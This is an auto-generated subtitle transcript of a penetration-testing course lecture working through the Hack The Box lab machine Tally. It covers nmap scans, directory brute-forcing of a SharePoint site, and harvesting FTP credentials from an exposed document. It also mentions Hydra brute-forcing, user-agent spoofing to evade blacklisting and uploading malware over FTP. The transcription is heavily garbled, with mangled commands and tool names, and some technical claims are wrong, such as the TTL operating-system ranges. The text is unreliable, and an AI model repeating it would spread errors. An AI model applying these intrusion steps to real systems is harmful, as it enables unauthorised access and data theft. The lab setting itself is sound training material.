1 00:00:00,330 --> 00:00:07,590 So here we are in Tally, and this is the initial access, I guess you could say, the exploitation 2 00:00:07,590 --> 00:00:13,110 lecture, that we're going to, of course, move into the privilege escalation lecture and then we'll 3 00:00:13,320 --> 00:00:18,510 do some debrief, some Internet response type stuff, and we'll look at how everything maps to the minor 4 00:00:18,510 --> 00:00:19,320 attack framework. 5 00:00:19,860 --> 00:00:23,660 So in the beginning, you know, we need to make sure first that our voices started up. 6 00:00:23,670 --> 00:00:25,560 So let's just confirm that it is. 7 00:00:29,240 --> 00:00:32,860 Let's see, here's my machine here and it's going to refresh this to make sure everything's current. 8 00:00:37,910 --> 00:00:39,020 All right, looks pretty good. 9 00:00:42,580 --> 00:00:47,620 All right, so first thing we need to do is make sure we are connected right now, we have nothing in 10 00:00:47,620 --> 00:00:52,150 this folder, but we're not going to to the VPN duty list. 11 00:00:52,210 --> 00:00:54,070 There's no T-Mac sessions listening either. 12 00:00:54,670 --> 00:00:57,490 So let's set this up now. 13 00:00:57,520 --> 00:01:02,770 We're going to want to make sure that Tmax logging is enabled so that we can sort of have a script or 14 00:01:02,770 --> 00:01:06,760 a narrative and we can basically have all of our commands copied to a file. 15 00:01:06,970 --> 00:01:12,550 And then we can go back and debrief and look at that file, you know, to sort of review our offensive 16 00:01:12,550 --> 00:01:13,090 activities. 17 00:01:13,090 --> 00:01:13,930 And we can learn from that. 18 00:01:14,340 --> 00:01:14,680 Right. 19 00:01:14,690 --> 00:01:17,740 So we should install tiebacks logging. 20 00:01:18,070 --> 00:01:25,690 If we do the team X.com file, we can see that we have the Shell ad saying we're on optimized logging. 21 00:01:26,260 --> 00:01:30,880 But if you look for that, you'll see it doesn't exist. 22 00:01:31,270 --> 00:01:32,860 So we need to grab Tmax logging first. 23 00:01:32,860 --> 00:01:33,660 We need to set that up. 24 00:01:34,410 --> 00:01:35,110 Let's go and do that. 25 00:01:46,490 --> 00:01:51,680 All right, so first thing we should do is install this team plugging plug in manager and we should 26 00:01:51,680 --> 00:01:53,350 add this to our dotcom file. 27 00:01:53,910 --> 00:01:54,940 So let's go ahead and do that. 28 00:01:56,860 --> 00:02:00,890 Let's over them tea mugs, dot com, 29 00:02:06,020 --> 00:02:08,060 and let's just go down and add it. 30 00:02:10,760 --> 00:02:13,580 Let's put it right here, right? 31 00:02:15,560 --> 00:02:16,400 What else do we need? 32 00:02:16,760 --> 00:02:22,370 Well, this is prefect's I to fetch the pocket and source it, so we need to be in session. 33 00:02:23,330 --> 00:02:31,670 The name is VPN and this will be gone and I'll just press control ehi to source and control a what's 34 00:02:31,670 --> 00:02:32,240 the prefix. 35 00:02:32,540 --> 00:02:34,910 And I was the command. 36 00:02:34,910 --> 00:02:38,660 I needed to fetch the pocket and source it now need to call in the repo. 37 00:02:44,530 --> 00:02:50,180 Should the this Campath obviously needs to match what we have in. 38 00:02:52,440 --> 00:02:55,100 The dotcom file, right, 39 00:02:58,140 --> 00:03:04,380 so you can see here, we're saying it's located here, so we want this clone back to match that. 40 00:03:05,700 --> 00:03:06,690 So let's go ahead and do that 41 00:03:11,520 --> 00:03:20,900 right away to go to the front row, which is what works and looks like it did exit this. 42 00:03:24,960 --> 00:03:30,420 What else do we have to reload the team environment? 43 00:03:30,690 --> 00:03:31,680 T-Mac source. 44 00:03:35,680 --> 00:03:43,720 File right control should be a very loaded it. 45 00:03:45,670 --> 00:03:46,480 Very cool. 46 00:03:46,630 --> 00:03:50,130 And let's see if this works now control a OK shift. 47 00:03:50,680 --> 00:03:52,620 Yes, we are now logging our history. 48 00:03:53,080 --> 00:03:55,120 Let's go full screen and let's have fun. 49 00:03:58,000 --> 00:04:02,230 So first, let's go to VPN, Cyro Open VPN. 50 00:04:02,470 --> 00:04:05,080 Let's make sure we connect to Hack in the box. 51 00:04:09,080 --> 00:04:12,300 Means we're connected to 21 immediately. 52 00:04:12,340 --> 00:04:14,960 Let's just save the target to a variable 53 00:04:18,530 --> 00:04:22,330 and you can see they've got this variable saved in this session. 54 00:04:26,020 --> 00:04:30,220 Now we're going to do is in the house, let's make sure it's active and I'm also going to show you how 55 00:04:30,220 --> 00:04:35,400 you can use this to identify the operating system with the host county. 56 00:04:36,010 --> 00:04:39,150 We want to ping four times and we want to ping the target. 57 00:04:40,960 --> 00:04:48,580 So the TTYL basically is documented each up and documented with each hop to the target. 58 00:04:48,910 --> 00:04:53,320 And we have one router between us and the target, and that's why it's recommended from 128, 20 to 59 00:04:53,340 --> 00:04:53,990 27. 60 00:04:54,580 --> 00:05:01,570 Now, if you're between 64 and 128 for TTL, that means you were running a Windows host, most likely 61 00:05:02,230 --> 00:05:05,880 if it's somewhere below 60 for it's most likely a Linux host. 62 00:05:05,890 --> 00:05:12,490 And if it's above 128, between 128 and 255, it's probably infrastructure running a specialized version 63 00:05:12,490 --> 00:05:15,710 of Linux or a proprietary operating system. 64 00:05:16,600 --> 00:05:18,260 So that is something very good to know. 65 00:05:19,420 --> 00:05:23,770 It's going M.F. against this maybe favor. 66 00:05:23,770 --> 00:05:25,620 Both seem the host is already active. 67 00:05:25,630 --> 00:05:26,470 Don't bother picking it. 68 00:05:26,980 --> 00:05:33,040 Make a difference as can you possibly can run run default scripts. 69 00:05:33,070 --> 00:05:36,040 These are safe scripts that won't knock the box over. 70 00:05:36,570 --> 00:05:41,830 Make sure the scans are verbose and that it shows the version number of the identified service. 71 00:05:41,860 --> 00:05:43,240 So we want to get the version information. 72 00:05:45,160 --> 00:05:53,680 We want to output everything in math and map format and we'll call it Tiida and map the open port. 73 00:05:53,710 --> 00:05:54,310 Show me the reason. 74 00:05:54,310 --> 00:06:01,300 If it's not open, I don't want this particular port range TCP ports from zero to six five, four, 75 00:06:01,300 --> 00:06:01,930 three, five. 76 00:06:02,560 --> 00:06:04,480 And then finally, the target 77 00:06:07,300 --> 00:06:12,540 immediately we see Port 80 is open and we see a bunch of other ports, 21. 78 00:06:12,540 --> 00:06:13,450 This is FPP. 79 00:06:14,200 --> 00:06:15,610 We've got some SMB ports. 80 00:06:16,270 --> 00:06:21,310 This is RBC here and these are Legacy RBC Ports, which are typically open in all versions of Windows 81 00:06:21,700 --> 00:06:23,220 and four for five for SMB. 82 00:06:23,230 --> 00:06:24,090 This is exposed. 83 00:06:24,100 --> 00:06:26,680 So this might be a Vector 81. 84 00:06:26,680 --> 00:06:31,420 We have a few other ports here, but I'm not too early on. 85 00:06:31,810 --> 00:06:32,940 But let's see what else we can do. 86 00:06:34,180 --> 00:06:34,840 Discovery 87 00:06:39,010 --> 00:06:41,650 and let's see if we can basically browse that page. 88 00:06:41,650 --> 00:06:45,070 Now, before we do that, we want to make sure that we get everything going through berp. 89 00:06:45,610 --> 00:06:47,560 So let's open up our. 90 00:06:53,170 --> 00:06:54,340 Make sure everything's filtering through. 91 00:07:10,760 --> 00:07:13,640 All right, quick next, let's start berp. 92 00:07:17,550 --> 00:07:23,970 Right, control ship, turn off, intercept proxy, go to options, scroll down, make sure you're intercepting 93 00:07:23,970 --> 00:07:30,390 requests, control shift, target map is ready to receive the Cytori. 94 00:07:30,850 --> 00:07:37,350 So what we're going to do is pop in this URL, how it's being filtered through berp. 95 00:07:42,890 --> 00:07:44,530 And we should start to see things build out. 96 00:07:44,590 --> 00:07:47,000 You can see already it's starting to happen now. 97 00:07:47,610 --> 00:07:49,640 We want to get some idea of what kind of page this is. 98 00:07:49,640 --> 00:07:50,990 You know, we could wait for the page to blow up. 99 00:07:50,990 --> 00:07:53,210 We could wait for everything to show up or we're going to take a look here. 100 00:07:53,990 --> 00:07:57,920 We notice in the response we can see that this application is running. 101 00:07:58,650 --> 00:08:05,240 I asked version 10, which means it's either running on a Windows 10 machine or Windows Server 2016 102 00:08:05,240 --> 00:08:07,400 or Windows Server 2019. 103 00:08:08,440 --> 00:08:10,820 So it's either one of those days running ASP.NET. 104 00:08:12,620 --> 00:08:16,330 And you can see here it's running Microsoft SharePoint Team Services. 105 00:08:16,350 --> 00:08:17,870 So this is most likely a SharePoint server. 106 00:08:18,350 --> 00:08:23,630 Now, there's another way we could do this to to identify what it is we could actually install WAP. 107 00:08:23,630 --> 00:08:29,450 Polisar, which is an awesome tool built with, is also another good one. 108 00:08:29,870 --> 00:08:33,980 Let's just install both of them because we'll need them later in this course. 109 00:08:39,930 --> 00:08:41,160 I don't even know if I spoke out, right? 110 00:08:42,450 --> 00:08:43,200 I did, I did. 111 00:08:43,890 --> 00:08:44,420 It's OK. 112 00:08:44,550 --> 00:08:45,660 Google fixes typos. 113 00:08:48,440 --> 00:08:51,140 All right, so we want the extension for Firefox. 114 00:09:07,540 --> 00:09:14,790 The pipelines were installed by George W w to close it out, let's get built with the. 115 00:09:33,780 --> 00:09:40,530 These are both have been added control w to close it out, and if we go to appetiser and built with 116 00:09:40,530 --> 00:09:41,670 oh, there we go, just take them on it. 117 00:09:42,090 --> 00:09:47,580 So built with is now showing Microsoft SharePoint and saying it's 50 percent sure about their Web server 118 00:09:48,210 --> 00:09:49,050 software as a service. 119 00:09:49,050 --> 00:09:49,890 Microsoft SharePoint. 120 00:09:50,070 --> 00:09:52,830 It can also identify a SharePoint by this icon here. 121 00:09:53,640 --> 00:09:59,940 Also, if you take control, you look at the source of the Web application, you'll see it, says SharePoint. 122 00:10:00,750 --> 00:10:05,310 Now that we know with a high degree of certainty we're working with SharePoint, we can start enumerating 123 00:10:05,820 --> 00:10:13,080 things related to SharePoint in maps can finished and you'll notice it actually says SharePoint services 124 00:10:14,400 --> 00:10:15,900 in the certificate. 125 00:10:16,320 --> 00:10:21,600 So we have high, high, high degree of degree of certainty that this is the SharePoint server that's 126 00:10:21,600 --> 00:10:30,690 going to look at what EMAP returned support 21 HTTP joining the Microsoft FTP that says the system is 127 00:10:30,690 --> 00:10:35,770 Windows and T, which it's probably a false positive since their point doesn't run on Windows ninety 128 00:10:35,790 --> 00:10:36,210 four. 129 00:10:38,100 --> 00:10:43,830 There's a favor can so you could say it didn't say SharePoint in the source or in the Chicopee response. 130 00:10:44,550 --> 00:10:51,990 You could pivot off the hash in Google to see where Marzotto to see what other web pages are using that 131 00:10:51,990 --> 00:10:57,150 feedback on and then potentially identify the browser technology that way. 132 00:10:57,990 --> 00:11:03,890 Alternatively you could download the A con and then go to look for it. 133 00:11:03,900 --> 00:11:04,880 This is the feedback on here, right. 134 00:11:04,890 --> 00:11:09,060 I can go right click actually have acted out of favor. 135 00:11:09,270 --> 00:11:11,850 I think I would have to go control you. 136 00:11:13,320 --> 00:11:13,920 They were gone. 137 00:11:14,010 --> 00:11:14,400 Yeah. 138 00:11:17,940 --> 00:11:20,520 Down this way and then I'd go like right. 139 00:11:20,520 --> 00:11:27,270 Click and see the image and then I would go to Google Images and do a Google image search. 140 00:11:27,630 --> 00:11:32,430 So Google is it Google dot com images or is it images. 141 00:11:32,430 --> 00:11:33,330 Dot Google dot com? 142 00:11:33,330 --> 00:11:34,950 I'm not sure yet. 143 00:11:35,070 --> 00:11:37,830 I think I think this is it. 144 00:11:37,830 --> 00:11:38,010 Yeah. 145 00:11:38,010 --> 00:11:42,540 I think if you click this camera right, you can upload an image and then you could actually up of the 146 00:11:42,540 --> 00:11:42,750 image. 147 00:11:42,750 --> 00:11:50,910 So for example, if I went here and I said file save image ads, I would put it in the right folder. 148 00:11:58,220 --> 00:12:05,480 Let's call it Simcock, it's called Khaleda Icko. 149 00:12:21,860 --> 00:12:23,120 Not seeing it for some reason. 150 00:12:26,610 --> 00:12:28,140 Maybe they can just drag and drop it in here. 151 00:12:30,430 --> 00:12:32,490 Try dragging an empty chair, OK, we can do that. 152 00:12:44,940 --> 00:12:45,750 Did I not save it? 153 00:13:01,750 --> 00:13:04,780 Felde That is really weird. 154 00:13:04,850 --> 00:13:06,250 OK, I have no idea why that's fine, 155 00:13:09,280 --> 00:13:10,740 but let's not go into too deeply anyway. 156 00:13:10,750 --> 00:13:13,840 You get the idea, you upload the image here and then you would find out what other pages are using 157 00:13:13,840 --> 00:13:13,990 it. 158 00:13:18,700 --> 00:13:22,150 So here you could of course, you would click sign and you could put a sign in that way. 159 00:13:22,720 --> 00:13:23,690 We don't have any credentials. 160 00:13:23,690 --> 00:13:25,060 So this is not going to help us much. 161 00:13:25,180 --> 00:13:26,050 Let's cancel this. 162 00:13:29,110 --> 00:13:35,350 For one, unauthorized, of course, let's go back and let's see what we can do here. 163 00:13:40,570 --> 00:13:45,320 So we already knew about Port 80, Port 81, that's a new one. 164 00:13:45,590 --> 00:13:46,570 Ever heard of that one yet? 165 00:13:48,130 --> 00:13:50,050 These are all the assembly ports. 166 00:13:50,680 --> 00:13:56,020 Interestingly enough, the operating system thinks it's running Windows Server 2008, R2 or 2012. 167 00:13:57,010 --> 00:14:00,220 It doesn't actually know based on the S&P. 168 00:14:03,010 --> 00:14:08,860 And then here we can see it running Microsoft SQL Server 2016 with the exact version number. 169 00:14:08,860 --> 00:14:14,770 So we could search such support for this version number to see if we can identify if there's any exploits 170 00:14:14,770 --> 00:14:17,650 available for this particular application. 171 00:14:20,020 --> 00:14:29,240 And we also can see down here the host name of the target, and also we have a product version. 172 00:14:29,260 --> 00:14:34,850 Again, this is something that we could key on to see if there's any public vulnerabilities in exploited 173 00:14:35,440 --> 00:14:37,660 or exploit. 174 00:14:37,850 --> 00:14:38,830 I don't know if you guys have heard of that. 175 00:14:38,830 --> 00:14:43,510 One is quite split our US. 176 00:14:47,560 --> 00:14:48,080 Exploits. 177 00:14:48,610 --> 00:14:49,950 Yeah, I think it's called Exploit US. 178 00:14:52,580 --> 00:14:56,980 Me just take a real quick it's goit us dotcom. 179 00:14:58,570 --> 00:14:59,430 Yeah, this is it. 180 00:14:59,830 --> 00:15:01,650 So this is an alternative to the Web. 181 00:15:01,840 --> 00:15:02,800 Not quite as many 182 00:15:05,800 --> 00:15:10,360 exploits as the exploited, but it's it's still pretty good. 183 00:15:11,230 --> 00:15:16,510 This is also a site that I strongly recommend when you're looking for public exploits and liabilities 184 00:15:16,510 --> 00:15:17,200 and things like that. 185 00:15:17,940 --> 00:15:20,260 See, we get some experts down here and you can search for them, of course. 186 00:15:22,560 --> 00:15:22,960 All right. 187 00:15:22,960 --> 00:15:23,910 So let's close up 188 00:15:26,890 --> 00:15:33,970 anything else, a couple of other ports from that five, fifteen, five, six, seven. 189 00:15:34,690 --> 00:15:35,890 So I don't know what these are. 190 00:15:36,130 --> 00:15:37,290 This hostname going to come in handy. 191 00:15:37,300 --> 00:15:39,220 We should probably put this in our host file. 192 00:15:39,640 --> 00:15:42,370 We'll do that in a second few other ports. 193 00:15:43,900 --> 00:15:46,390 I'm not really too worried about these high level ports right now. 194 00:15:46,750 --> 00:15:50,950 And if we get stuck that we can circle back around to see if there's something that increased the attack 195 00:15:50,950 --> 00:15:54,550 surface of the target through one of these ports. 196 00:15:55,420 --> 00:15:58,840 OK, so what we can do is go back to Discovery 197 00:16:01,960 --> 00:16:05,080 and we can go bust here, which we don't have seats red. 198 00:16:05,830 --> 00:16:10,630 So we can do zero Afghans, dog or buster and all the installs. 199 00:16:11,350 --> 00:16:15,130 We can start looking for common SharePoint girls. 200 00:16:15,130 --> 00:16:15,380 Right. 201 00:16:16,420 --> 00:16:17,350 So now I can go here. 202 00:16:17,920 --> 00:16:21,730 I could just Google like common SharePoint 203 00:16:25,660 --> 00:16:27,880 while I cannot spell girls. 204 00:16:29,940 --> 00:16:35,660 I mean, there, get a few here, so this might be interesting, right, so content realist's, we could 205 00:16:35,660 --> 00:16:42,740 try that out, like basically just, you know, copy this and see if we can just, like, append it 206 00:16:43,190 --> 00:16:43,610 here. 207 00:16:46,120 --> 00:16:48,400 He would have to slash something loads. 208 00:16:52,070 --> 00:16:52,490 OK, good. 209 00:16:52,520 --> 00:16:58,280 So we actually did get something, the other thing we could do is we could just Google for like SharePoint 210 00:16:58,290 --> 00:16:59,040 Pindar's report. 211 00:17:04,430 --> 00:17:08,420 Sometimes these things leak to the Internet and you can get everything you need from there. 212 00:17:10,280 --> 00:17:12,200 Or at least we have a good, you know, a good starting point. 213 00:17:12,380 --> 00:17:16,550 It's like this is a PDF and this might give us something to work with. 214 00:17:18,410 --> 00:17:21,950 Yeah, it's a sample SharePoint scan report. 215 00:17:25,550 --> 00:17:33,470 So this is a fictitious website, SharePoint Target dot com of SharePoint information of these targets. 216 00:17:33,890 --> 00:17:37,250 So these might be interesting by these. 217 00:17:37,250 --> 00:17:41,000 I'm referring to these these path right here. 218 00:17:44,570 --> 00:17:45,610 See what else we have in here. 219 00:17:49,050 --> 00:17:54,840 So this right here, and Tiger could use this information to make specific attacks against this airport 220 00:17:54,850 --> 00:17:58,090 installation and might be useful. 221 00:18:00,060 --> 00:18:01,420 Got these catalogs 222 00:18:04,510 --> 00:18:08,100 for catalog pages could contain confidential information, which could be useful to attackers. 223 00:18:08,120 --> 00:18:09,260 We might want to check this one out. 224 00:18:12,890 --> 00:18:17,150 Other pages here, the nice thing about this Pentax report is that it actually includes, like the description 225 00:18:17,150 --> 00:18:22,160 of the risk and then the recommendations that you're not just hunting in the blind or hunting blind 226 00:18:22,160 --> 00:18:23,100 for all this information. 227 00:18:24,370 --> 00:18:24,670 Right. 228 00:18:26,480 --> 00:18:32,840 So I like the idea of, you know, looking for public interest reports on the target that you're testing 229 00:18:32,840 --> 00:18:36,740 to see if you can find, you know, a point of entry point. 230 00:18:36,970 --> 00:18:37,190 Right. 231 00:18:37,250 --> 00:18:38,600 Click a duplicate this tab. 232 00:18:39,200 --> 00:18:44,300 We can probably go to the path that was included inside that report. 233 00:18:52,100 --> 00:18:54,620 And see if there's anything that's kind of interesting. 234 00:18:56,190 --> 00:18:57,770 Not exactly what I expected. 235 00:19:00,440 --> 00:19:07,460 Anyway, let's go back here and let's go first back to our host while, as we said, we were going to 236 00:19:08,090 --> 00:19:14,960 update that sido them as he hosts 237 00:19:18,320 --> 00:19:22,280 Tenten ten fifty nine tally. 238 00:19:24,470 --> 00:19:25,670 Remember where we got that from? 239 00:19:26,570 --> 00:19:28,190 We got that from our EMAP output. 240 00:19:32,250 --> 00:19:32,730 Right here. 241 00:19:32,940 --> 00:19:38,430 All right, so we've got a target and we're just going to that 12 and. 242 00:19:41,570 --> 00:19:51,940 We now should have combustor, we do so what we can do now is start a cooperative session so we can 243 00:19:52,370 --> 00:19:53,060 go bust here. 244 00:19:55,010 --> 00:19:56,260 So go Globemaster in a command. 245 00:19:56,480 --> 00:19:58,770 What we want to be I want a list of directories. 246 00:19:58,820 --> 00:20:00,410 We're basically doing forced browsing. 247 00:20:03,500 --> 00:20:07,760 And so now we've got Globemaster GUIORA. 248 00:20:07,760 --> 00:20:10,730 We need some flags here, the flags here, the options. 249 00:20:10,970 --> 00:20:11,570 What do we want? 250 00:20:14,060 --> 00:20:18,950 Well, I'd say we should expect the full URLs. 251 00:20:20,840 --> 00:20:24,980 We should include the length of the body in the output. 252 00:20:27,590 --> 00:20:28,190 What else? 253 00:20:30,110 --> 00:20:30,580 You were out, 254 00:20:33,950 --> 00:20:40,130 and if I do a thing against Talli, you should resolve and it does because of what we have in our host 255 00:20:40,130 --> 00:20:43,010 file to resolving that name to the IP. 256 00:20:45,140 --> 00:20:48,560 So I can do your EDP tally 257 00:20:51,650 --> 00:20:52,690 is registering. 258 00:20:52,730 --> 00:20:54,020 We'll keep that the same for now. 259 00:20:54,560 --> 00:20:59,360 If we went up against any blacklisting, are there any defenses that the target's using? 260 00:20:59,360 --> 00:21:07,060 We can try to bypass it by changing our user agent trying to match a benign browser like Chrome threads. 261 00:21:07,190 --> 00:21:08,840 Let's keep it low right now. 262 00:21:10,590 --> 00:21:11,780 We're going to run this in the background. 263 00:21:12,260 --> 00:21:21,150 We don't want to knock over the server with our skin and the a word list now of getting output going. 264 00:21:21,680 --> 00:21:23,150 I'll put this into Talledega. 265 00:21:23,480 --> 00:21:24,140 Go, buster. 266 00:21:25,500 --> 00:21:27,800 And the word list is interesting. 267 00:21:27,980 --> 00:21:28,730 What are we going to use? 268 00:21:30,500 --> 00:21:33,920 Well, we can do a search for anything with SharePoint in the name. 269 00:21:34,760 --> 00:21:37,420 So we get a few files, some Ruby files and Mexica files. 270 00:21:37,430 --> 00:21:38,450 We only want textiles. 271 00:21:40,310 --> 00:21:45,380 So what we could do is we could use to find starting root cases instead of search for anything with 272 00:21:45,380 --> 00:21:45,790 SharePoint. 273 00:21:45,830 --> 00:21:51,200 Any type of file said all the errors to the BitBucket. 274 00:21:55,760 --> 00:22:00,470 Now, we've got some files that are wordless clearly, but we don't know which one to pick. 275 00:22:00,850 --> 00:22:08,060 And so the way I think about this logically is you probably want the one that has the most unique minds 276 00:22:08,180 --> 00:22:09,460 related to SharePoint in it. 277 00:22:10,490 --> 00:22:19,340 So let's go ahead and use the exact command to run the C command against each of these files. 278 00:22:20,060 --> 00:22:24,050 And then we can get an idea of how many lines are in each file and then which one we should use for 279 00:22:24,050 --> 00:22:26,180 our our skin. 280 00:22:42,180 --> 00:22:47,800 I'm going right here, 17 08, this looks very promising, so let's grab this 281 00:22:51,370 --> 00:22:52,900 and we can let that go. 282 00:22:56,770 --> 00:23:05,770 Now, while this runs, Democrats running to the starting gate, it is running for the go play with 283 00:23:05,770 --> 00:23:06,100 this. 284 00:23:06,370 --> 00:23:12,190 So I'm going to go and put in the host name because usually I get better results when using his name. 285 00:23:16,390 --> 00:23:21,690 And I click these two right here because we see one item for each documents inside pages. 286 00:23:21,690 --> 00:23:24,730 So it's probably something of interest here. 287 00:23:26,470 --> 00:23:31,390 We can take our birdbaths loads and we say we have tally with the hostname here. 288 00:23:37,060 --> 00:23:38,820 A bunch of different folders are being built out. 289 00:23:40,730 --> 00:23:41,300 That's pretty cool. 290 00:23:44,030 --> 00:23:48,500 All right, what's even cooler is we have something called F.T. Piddles, let's go and grab that. 291 00:23:53,740 --> 00:23:57,520 We don't have anything to open it with, so we're going to probably have to install LibreOffice or let's 292 00:23:57,520 --> 00:24:02,500 say that I'm sure downloads looks like it did. 293 00:24:04,320 --> 00:24:14,850 And let's copy it to his current folder to shift to, quote, zero move downloads to his current folder. 294 00:24:17,890 --> 00:24:20,670 Let's just make sure that it is a document should be a zip archive. 295 00:24:20,680 --> 00:24:24,330 And it is not Doc X Files are actually zip files. 296 00:24:24,990 --> 00:24:30,180 This is the legacy document file format, four word documents. 297 00:24:30,690 --> 00:24:38,910 So when you leave office, which we don't have to read so I can do the apt install Libra to complete 298 00:24:40,080 --> 00:24:45,550 while there's a lot we just want LibreOffice Tech Y to answer yes to all the defaults. 299 00:24:45,570 --> 00:24:50,670 And let's let that do its thing while we wait. 300 00:24:52,230 --> 00:24:59,130 All right, so we'll let that run and then we have a finance team web page because of the Internet Explorer 301 00:24:59,130 --> 00:25:04,170 logo and again, sometimes you'll discover that these Web applications are slow. 302 00:25:04,530 --> 00:25:07,770 That's because these are VMS running, in fact, the box and you're connected through a virtual private 303 00:25:07,770 --> 00:25:08,160 network. 304 00:25:08,430 --> 00:25:12,600 You know, even if you've got like Gigha Blast or some fiber optic connection going to your network, 305 00:25:13,350 --> 00:25:14,700 you might still be a little bit frustrated. 306 00:25:14,700 --> 00:25:15,630 But this is like real life. 307 00:25:15,630 --> 00:25:21,480 You know, a lot of times the web that you're targeting, if it's a pen test or a red team operation, 308 00:25:21,690 --> 00:25:22,800 will be slow and buggy. 309 00:25:23,160 --> 00:25:24,810 And so don't let that discourage you. 310 00:25:25,530 --> 00:25:28,860 So we've got something here interesting from the finance team migration update. 311 00:25:28,860 --> 00:25:30,180 Something related lead to a migration. 312 00:25:31,540 --> 00:25:31,750 Right. 313 00:25:33,000 --> 00:25:33,630 Hi, Hyla. 314 00:25:34,200 --> 00:25:37,680 Welcome to your new team page, as always. 315 00:25:37,690 --> 00:25:43,380 There's still a few finishing touches to make sure that we have a potential user name that we can potentially 316 00:25:44,460 --> 00:25:45,210 root for us. 317 00:25:46,020 --> 00:25:47,610 Maybe we could be forced to sign in here. 318 00:25:48,090 --> 00:25:49,530 I don't know, using Hydra. 319 00:25:49,540 --> 00:25:50,490 I mean, it's a good idea, right? 320 00:25:50,670 --> 00:25:51,270 Let's keep reading. 321 00:25:51,960 --> 00:25:57,660 Please upload the design mockups to the Internet folder as index that e-mail using the FTP user account. 322 00:25:57,960 --> 00:26:02,340 And we've got an FPP account I aim to regularly review. 323 00:26:02,940 --> 00:26:04,260 I aim to review regularly. 324 00:26:06,210 --> 00:26:09,630 We'll also add the fund in client account pages in due course thinks they're in. 325 00:26:10,320 --> 00:26:17,910 So now we know this application is listening on point twenty one, which is HTTP. 326 00:26:21,460 --> 00:26:25,920 So this account is most likely going to come in handy, so let's go ahead and create a file. 327 00:26:26,260 --> 00:26:27,930 It's called like threads of text 328 00:26:33,650 --> 00:26:36,810 and what we're going to do is put in control of the user name. 329 00:26:36,820 --> 00:26:37,840 We don't have a password yet. 330 00:26:38,470 --> 00:26:41,260 We can put where we retreated from, which is this page. 331 00:26:48,110 --> 00:26:56,660 All right, let's go back to go back there and see what's going on, LibreOffice is still running. 332 00:26:58,510 --> 00:27:01,220 Looks like Globalstar finished 333 00:27:08,000 --> 00:27:08,780 the violence here. 334 00:27:08,820 --> 00:27:11,510 Thirty four thousand kilobytes. 335 00:27:12,050 --> 00:27:13,850 So script for some interesting things, right? 336 00:27:14,390 --> 00:27:20,600 You know, we could search for like documents so we can do like pseudo grap color equals always. 337 00:27:21,980 --> 00:27:25,000 Chauvelin no thinketh insensitive. 338 00:27:26,870 --> 00:27:30,110 We want to search for and we can use regular expressions. 339 00:27:30,320 --> 00:27:31,130 We don't need to do that. 340 00:27:31,130 --> 00:27:32,030 That we could just say, 341 00:27:35,890 --> 00:27:37,160 I don't know, doc, 342 00:27:39,980 --> 00:27:44,500 and we could put the final tab complete. 343 00:27:46,490 --> 00:27:49,370 OK, so there's some other potentially interesting endpoints here. 344 00:27:50,150 --> 00:27:51,800 You see, you've got to understand this code here. 345 00:27:53,030 --> 00:27:56,570 In fact, if we only want to see the hundreds, if we could just go up again and we could say, like 346 00:27:56,570 --> 00:27:59,180 Diondre, you know, we only get this one right. 347 00:28:00,170 --> 00:28:05,370 So you can always change grep together with this pipe. 348 00:28:05,960 --> 00:28:07,850 Now, I don't know if that has performance implications. 349 00:28:07,850 --> 00:28:08,540 I'm sure it does. 350 00:28:08,540 --> 00:28:11,200 But we're not writing a performance sensitive scripts. 351 00:28:11,300 --> 00:28:14,790 We are simply hacking this box right now. 352 00:28:14,810 --> 00:28:16,340 So performance is not an issue. 353 00:28:17,420 --> 00:28:19,340 So let's wait for this to finish and then let's see what we get back. 354 00:28:20,270 --> 00:28:26,810 We need to wait for a labor office to install so we can view that document on this one right here. 355 00:28:27,540 --> 00:28:32,150 FTP details looks juicy to LibreOffice is done. 356 00:28:33,990 --> 00:28:36,590 See here so we can go to the beginning. 357 00:28:36,590 --> 00:28:43,910 Cyro LibreOffice, let's open this document and we're going to put the ampersand at the end, which 358 00:28:43,910 --> 00:28:47,090 background's the process of that control returns to the show. 359 00:28:47,270 --> 00:28:54,950 We left that off and it would hang the shell and only give us control back when we closed the document. 360 00:28:55,890 --> 00:28:56,870 So that's why I like that. 361 00:28:56,870 --> 00:28:59,300 Combining the processes, you could actually see the pit of the process. 362 00:28:59,300 --> 00:29:00,470 I see right there the. 363 00:29:06,920 --> 00:29:10,510 Right, so we've got to leave her office open tip of the day, don't care about that. 364 00:29:10,700 --> 00:29:12,070 The cement bottom right corner. 365 00:29:13,780 --> 00:29:14,620 All right, what do we have? 366 00:29:14,620 --> 00:29:17,440 Whose name we knew about Ali Workgroup we did not know about. 367 00:29:18,010 --> 00:29:20,080 So let's go and add that to our host file, 368 00:29:23,770 --> 00:29:25,180 Etsy hosts. 369 00:29:29,710 --> 00:29:36,400 We can do a tally that should be this gives us possibly a fully qualified domain that we can use later. 370 00:29:37,570 --> 00:29:38,920 We've got what looks like a password. 371 00:29:38,920 --> 00:29:41,260 Please create your own user folder upon logging in. 372 00:29:41,410 --> 00:29:49,570 OK, so it looks like we also have write access to this FTP server, so maybe we can use this as a mechanism 373 00:29:49,570 --> 00:29:55,330 for uploading malware to the box and we should put this course inside of our credential file 374 00:30:03,220 --> 00:30:04,700 and immediately we should try this out. 375 00:30:05,140 --> 00:30:11,280 Let's go back to Rickon FTB Tally, PGP user. 376 00:30:13,880 --> 00:30:16,420 Let's see what that password is. 377 00:30:18,920 --> 00:30:29,090 Joseph F.C. Josh of the Inter yeah, yeah, yeah, we've got some good stuff in here, so I think we 378 00:30:29,090 --> 00:30:30,170 should download everything. 379 00:30:31,040 --> 00:30:36,290 You know, there's probably a lot of stuff in here and it's going to be hard to just CD either. 380 00:30:36,290 --> 00:30:36,770 Everything. 381 00:30:37,860 --> 00:30:39,970 I don't really know, you know, where to go. 382 00:30:40,250 --> 00:30:43,250 So it's got to be a lot easier to get to actually mirror. 383 00:30:43,250 --> 00:30:52,070 The entire episode is actually a tool called I think it's like Kerl FTP or something like that. 384 00:30:52,340 --> 00:30:57,260 Yeah, crockpots, Kearl FTP, that's what it's called. 385 00:30:58,070 --> 00:31:07,610 You could use this to essentially treat your FTP server like a like a webpage and basically download 386 00:31:07,610 --> 00:31:08,120 everything from it. 387 00:31:08,120 --> 00:31:11,830 But I like using what you get because it's a lot easier to remember my opinion. 388 00:31:13,010 --> 00:31:17,480 So we could like CBW, get tech tech, help me close this time. 389 00:31:21,400 --> 00:31:30,760 And I think the spot on a little bit smaller so we can build up our command, get what we want to do, 390 00:31:30,880 --> 00:31:37,390 what we want to look for, like crap mirror so we can mirror the page. 391 00:31:38,170 --> 00:31:41,580 Of course, we're going to need an option of putting in a password. 392 00:31:41,620 --> 00:31:46,000 So if we do search for user in the help case sensitive search, that's what the dashi does. 393 00:31:46,000 